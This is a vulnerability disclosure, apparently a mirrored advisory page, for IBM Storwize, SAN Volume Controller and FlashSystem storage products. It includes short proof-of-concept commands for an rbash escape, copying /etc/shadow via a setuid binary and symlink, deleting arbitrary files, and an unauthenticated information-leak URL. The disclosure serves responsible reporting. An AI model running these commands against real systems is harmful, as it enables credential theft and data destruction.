CVE-2018-1462: Ineffective rBash Configuration
---------------------------------------------

On machines with a restricted bash, a possible escape from rBash looks like
the following:
BASH_CMDS[escape]=/bin/bash;escape

--------------------------------------------------
CVE-2018-1463: World readable credentials and encryption keys
--------------------------------------------------

While some systems have removed the world-read bit from several files and
directories, more important files which contain application configuration
details, passwords and secret keys are world readable and sometimes also
world writable. On the IBM Flash System, this also includes the storage
encryption key.

# Partial directory listing of /persist/ on the Unified system:
drwxr-xr-x.  2 root root   4096 Jan 18 01:35 .
drwxr-xr-x. 29 root root   4096 Aug 15 16:16 ..
...
-rw-r--r--.  1 root root  27040 Jan 16 08:28 vpd
...

# Partial directory listing of /mnt/plfs on the Flash system:
drwxrwxrwx 4 root  root        0 Dec 31  1969 .
drwxr-x--x 7 root  root     1024 Jan  8 07:41 ..
-rw-rw-rw- 1 root  root       24 Oct 24  2016 encryption.key

-----------------------------------------------
CVE-2018-1464: Sensitive file disclosure of files readable by root
-----------------------------------------------

The setuid binary svc_copy is a wrapper around the script sw_copy which
calls cp on the shell.

Creating a symlink to any file, this file can be copied as root to /dumps
and is world readable/writable (-rw-rw-rw- ):

$ ln -s /etc/shadow /tmp/shadow
$ ./svc_copy /tmp/shadow /dumps/

The file /dumps/shadow is now world readable with the permissions
(-rw-rw-rw- )

---------------------------------------------
CVE-2018-1495: Arbitrary file deletion
---------------------------------------------

The setuid binary log_cleanup is a wrapper around log_cleanup.py

This binary wipes the directories /dumps or /tmp and has an undocumented
feature "-s" (delete target of symlink).

The following command deletes an arbitrary file (e.g. /etc/shadow):
$ ln -s /etc/shadow /tmp/shadow
$ ./log_cleanup -s
Select /tmp as target directory to be wiped

--------------------------------------------------
CVE-2018-1467: Unauthenticated information disclosure
--------------------------------------------------

Some web handlers on the V7000 Unified expose system configuration without
authentication which could be used by an attacker to collect vital details
about the environment.

https://v7ku01/SonasInfoServlet?challenge=1
CLUSTER_ID=<redacted>;NAME=<redacted>.ibm;PROFILE=V7000
Unified;SYSTEM_NAME=<redacted>.ibm;mgmt001st001=<redacted>;mgmt002st001=<redacted>;idMapConfig=10000000-299999999,1000000;adHost<redacted>;krbMode=off;domain=<redacted>;idMapRole=master;realm=<redacted>;userName=<redacted>;idMappingMethod=auto;passwordServer=*;AUTH_TYPE=ad;IDMAP_10000000-10999999=ALLOC,ALLOC,auto;IDMAP_11000000-11999999=BUILTIN,S-1-5-32,auto;IDMAP_12000000-12999999=<redacted>,S-1-5-21-<redacted>,auto;IDMAP_13000000-13999999=<redacted>,S-1-5-21-<redacted>,auto;
CHALLENGE <redacted>


-----------------------------------------------
CVE-2018-1465: Unprivileged web server process may read SSL private key
-----------------------------------------------

The current private key for the installed SSL certificate on the V7000 FC
CE Cannister Node is readable by the webadmin user:
-rw-r----- 1 webadmin 1000 1679 Aug 15 09:47 /dev/server.key

As a result the file can be read through vulnerabilities in the web
application, e.g. via the DownloadFile handler (see separate issue).

Certificate details:
Validity: 15 years
Subject: C=GB, L=Hursley, O=IBM, OU=SSG, CN=2076,
emailAddress=support@ibm.com

---------------------------------------------
CVE-2018-1466: Weak password hashing algorithm used
---------------------------------------------

The root password on the V7000 (CE) FC Cannister and Flash System nodes
(and probably others, too) are hashed with a weak algorithm (DES) instead
of the SHA512 which is the system's default according to /etc/login.defs.

--------------------------------------------------
CVE-2018-1461: Missing Security Related HTTP Headers
--------------------------------------------------

XSS Protection HTTP Header
The XSS Filter is a feature that is built into modern web browsers and is
meant to prevent reflective Cross Site Scripting attacks. This feature can
be explicitly turned on (and also off) by using the HTTP header
X-XSS-Protection.

X-Content-Type Header
To make MIME type confusion attacks harder, the HTTP header
X-Content-Type-Options can be set. This header prevents trusting the user
provided MIME type and instead guessing the MIME type of the server
response.

Author
======
The vulnerabilities were discovered by Sebastian Neuner (@sebastian9er) and
Jan Bee from the Google Security Team.

Timeline
========
2018/01/26 - Security report sent to psirt@us.ibm.com with 90 day
disclosure deadline (2018/04/26).
2018/01/29 - IBM acknowledges report and starts working on the issues.
2018/04/13 - IBM requested grace period due to internal patch cycle.
2018/04/16 - Google granted two week grace period (from 2018/04/26 to
2018/05/11).
2018/05/11 - Public disclosure on the Full Disclosure/Bugtraq Mailing List.
    

- 漏洞信息

Multiple IBM Products Multiple Security Vulnerabilities
Input Validation Error 104349
Yes No
2018-05-11 12:00:00 2018-05-11 12:00:00
Jan Bee, and Sebastian Neuner from the Google Security Team

- 受影响的程序版本

IBM Storwize V7000 8.1.2.0
IBM Storwize V7000 8.1.1.1
IBM Storwize V7000 8.1.0.1
IBM Storwize V7000 8.1.0.0
IBM Storwize V7000 8.0
IBM Storwize V7000 7.8.1.5
IBM Storwize V7000 7.8
IBM Storwize V7000 7.7.1.8
IBM Storwize V7000 7.7
IBM Storwize V7000 7.6.1.3
IBM Storwize V7000 7.6.1.1
IBM Storwize V7000 7.6.0.4
IBM Storwize V7000 7.6.0.3
IBM Storwize V7000 7.6
IBM Storwize V7000 7.5.0.8
IBM Storwize V7000 7.5.0.7
IBM Storwize V7000 7.5.0.6
IBM Storwize V7000 7.5.0.3
IBM Storwize V7000 7.5.0.2
IBM Storwize V7000 7.5.0.13
IBM Storwize V7000 7.5
IBM Storwize V5000 8.1.2.0
IBM Storwize V5000 8.1.1.1
IBM Storwize V5000 8.1.0.1
IBM Storwize V5000 8.1.0.0
IBM Storwize V5000 8.0
IBM Storwize V5000 7.8.1.5
IBM Storwize V5000 7.8
IBM Storwize V5000 7.7.1.8
IBM Storwize V5000 7.7
IBM Storwize V5000 7.6.1.3
IBM Storwize V5000 7.6.1.1
IBM Storwize V5000 7.6.0.4
IBM Storwize V5000 7.6.0.3
IBM Storwize V5000 7.6
IBM Storwize V5000 7.5.0.8
IBM Storwize V5000 7.5.0.7
IBM Storwize V5000 7.5.0.6
IBM Storwize V5000 7.5.0.3
IBM Storwize V5000 7.5.0.2
IBM Storwize V5000 7.5.0.13
IBM Storwize V5000 7.5
IBM Storwize V3700 8.1.2.0
IBM Storwize V3700 8.1.1.1
IBM Storwize V3700 8.0
IBM Storwize V3700 7.8.1.5
IBM Storwize V3700 7.8
IBM Storwize V3700 7.7.1.8
IBM Storwize V3700 7.7
IBM Storwize V3700 7.6.1.3
IBM Storwize V3700 7.6.1.1
IBM Storwize V3700 7.6.0.4
IBM Storwize V3700 7.6.0.3
IBM Storwize V3700 7.6
IBM Storwize V3700 7.5.0.8
IBM Storwize V3700 7.5.0.7
IBM Storwize V3700 7.5.0.6
IBM Storwize V3700 7.5.0.3
IBM Storwize V3700 7.5.0.2
IBM Storwize V3700 7.5.0.13
IBM Storwize V3700 7.5
IBM Storwize V3500 8.1.2.0
IBM Storwize V3500 8.1.1.1
IBM Storwize V3500 8.0
IBM Storwize V3500 7.8.1.5
IBM Storwize V3500 7.8
IBM Storwize V3500 7.7.1.8
IBM Storwize V3500 7.7
IBM Storwize V3500 7.6.1.3
IBM Storwize V3500 7.6.1.1
IBM Storwize V3500 7.6.0.4
IBM Storwize V3500 7.6.0.3
IBM Storwize V3500 7.6
IBM Storwize V3500 7.5.0.8
IBM Storwize V3500 7.5.0.7
IBM Storwize V3500 7.5.0.6
IBM Storwize V3500 7.5.0.3
IBM Storwize V3500 7.5.0.2
IBM Storwize V3500 7.5.0.13
IBM Storwize V3500 7.5
IBM Spectrum Virtualize Software 8.1.2.0
IBM Spectrum Virtualize Software 8.1.1.1
IBM Spectrum Virtualize Software 8.1
IBM Spectrum Virtualize Software 8.0
IBM Spectrum Virtualize Software 7.8.1.5
IBM Spectrum Virtualize Software 7.8
IBM Spectrum Virtualize Software 7.7.1.8
IBM Spectrum Virtualize Software 7.7
IBM Spectrum Virtualize Software 7.5.0.13
IBM Spectrum Virtualize for Public Cloud 8.1.2.0
IBM Spectrum Virtualize for Public Cloud 8.1.1.1
IBM Spectrum Virtualize for Public Cloud 8.1
IBM Spectrum Virtualize for Public Cloud 8.0
IBM Spectrum Virtualize for Public Cloud 7.8.1.5
IBM Spectrum Virtualize for Public Cloud 7.8
IBM Spectrum Virtualize for Public Cloud 7.7.1.8
IBM Spectrum Virtualize for Public Cloud 7.7
IBM Spectrum Virtualize for Public Cloud 7.5.0.13
IBM Spectrum Virtualize for Public Cloud 7.5
IBM SAN Volume Controller 8.1.2.0
IBM SAN Volume Controller 8.1.1.1
IBM SAN Volume Controller 8.1.0.1
IBM SAN Volume Controller 8.1.0.0
IBM SAN Volume Controller 8.0
IBM SAN Volume Controller 7.8.1.5
IBM SAN Volume Controller 7.8
IBM SAN Volume Controller 7.7.1.8
IBM SAN Volume Controller 7.7
IBM SAN Volume Controller 7.6.1.3
IBM SAN Volume Controller 7.6.1.1
IBM SAN Volume Controller 7.6.0.4
IBM SAN Volume Controller 7.6.0.3
IBM SAN Volume Controller 7.6
IBM SAN Volume Controller 7.5.0.8
IBM SAN Volume Controller 7.5.0.7
IBM SAN Volume Controller 7.5.0.6
IBM SAN Volume Controller 7.5.0.3
IBM SAN Volume Controller 7.5.0.13
IBM SAN Volume Controller 7.5
IBM FlashSystem V9000 8.1.2.0
IBM FlashSystem V9000 8.1.1.1
IBM FlashSystem V9000 8.1.0.1
IBM FlashSystem V9000 8.1.0.0
IBM FlashSystem V9000 8.0
IBM FlashSystem V9000 7.8.1.5
IBM FlashSystem V9000 7.8
IBM FlashSystem V9000 7.7.1.8
IBM FlashSystem V9000 7.7
IBM FlashSystem V9000 7.5.0.13
,IBM Storwize V7000 8.1.2.1
IBM Storwize V7000 8.1.1.2
IBM Storwize V7000 7.8.1.6
IBM Storwize V7000 7.7.1.9
IBM Storwize V7000 7.5.0.14
IBM Storwize V5000 8.1.2.1
IBM Storwize V5000 8.1.1.2
IBM Storwize V5000 7.8.1.6
IBM Storwize V5000 7.7.1.9
IBM Storwize V5000 7.5.0.14
IBM Storwize V3700 8.1.2.1
IBM Storwize V3700 8.1.1.2
IBM Storwize V3700 7.8.1.6
IBM Storwize V3700 7.7.1.9
IBM Storwize V3700 7.5.0.14
IBM Storwize V3500 8.1.2.1
IBM Storwize V3500 8.1.1.2
IBM Storwize V3500 7.8.1.6
IBM Storwize V3500 7.7.1.9
IBM Storwize V3500 7.5.0.14
IBM Spectrum Virtualize Software 8.1.2.1
IBM Spectrum Virtualize Software 8.1.1.2
IBM Spectrum Virtualize Software 7.8.1.6
IBM Spectrum Virtualize Software 7.7.1.9
IBM Spectrum Virtualize Software 7.5.0.14
IBM Spectrum Virtualize for Public Cloud 8.1.2.1
IBM Spectrum Virtualize for Public Cloud 8.1.1.2
IBM Spectrum Virtualize for Public Cloud 7.8.1.6
IBM Spectrum Virtualize for Public Cloud 7.7.1.9
IBM Spectrum Virtualize for Public Cloud 7.5.0.14
IBM SAN Volume Controller 8.1.2.1
IBM SAN Volume Controller 8.1.1.2
IBM SAN Volume Controller 7.8.1.6
IBM SAN Volume Controller 7.7.1.9
IBM SAN Volume Controller 7.5.0.14
IBM FlashSystem V9000 8.1.2.1
IBM FlashSystem V9000 8.1.1.2
IBM FlashSystem V9000 7.8.1.6
IBM FlashSystem V9000 7.7.1.9
IBM FlashSystem V9000 7.5.0.14

- 不受影响的程序版本

IBM Storwize V7000 8.1.2.1
IBM Storwize V7000 8.1.1.2
IBM Storwize V7000 7.8.1.6
IBM Storwize V7000 7.7.1.9
IBM Storwize V7000 7.5.0.14
IBM Storwize V5000 8.1.2.1
IBM Storwize V5000 8.1.1.2
IBM Storwize V5000 7.8.1.6
IBM Storwize V5000 7.7.1.9
IBM Storwize V5000 7.5.0.14
IBM Storwize V3700 8.1.2.1
IBM Storwize V3700 8.1.1.2
IBM Storwize V3700 7.8.1.6
IBM Storwize V3700 7.7.1.9
IBM Storwize V3700 7.5.0.14
IBM Storwize V3500 8.1.2.1
IBM Storwize V3500 8.1.1.2
IBM Storwize V3500 7.8.1.6
IBM Storwize V3500 7.7.1.9
IBM Storwize V3500 7.5.0.14
IBM Spectrum Virtualize Software 8.1.2.1
IBM Spectrum Virtualize Software 8.1.1.2
IBM Spectrum Virtualize Software 7.8.1.6
IBM Spectrum Virtualize Software 7.7.1.9
IBM Spectrum Virtualize Software 7.5.0.14
IBM Spectrum Virtualize for Public Cloud 8.1.2.1
IBM Spectrum Virtualize for Public Cloud 8.1.1.2
IBM Spectrum Virtualize for Public Cloud 7.8.1.6
IBM Spectrum Virtualize for Public Cloud 7.7.1.9
IBM Spectrum Virtualize for Public Cloud 7.5.0.14
IBM SAN Volume Controller 8.1.2.1
IBM SAN Volume Controller 8.1.1.2
IBM SAN Volume Controller 7.8.1.6
IBM SAN Volume Controller 7.7.1.9
IBM SAN Volume Controller 7.5.0.14
IBM FlashSystem V9000 8.1.2.1
IBM FlashSystem V9000 8.1.1.2
IBM FlashSystem V9000 7.8.1.6
IBM FlashSystem V9000 7.7.1.9
IBM FlashSystem V9000 7.5.0.14

- 漏洞讨论

Multiple IBM Products are prone to the following multiple security vulnerabilities:

1. Multiple information-disclosure vulnerabilities
2. A cross-site scripting vulnerability
3. An access-bypass vulnerability
4. A security-bypass vulnerability
5. A cross-site request-forgery vulnerability

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, perform unauthorized access, gain unauthorized access to the affected application or to obtain sensitive information.

- 漏洞利用

Currently, we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 解决方案

Updates are available. Please see the references or vendor advisory for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站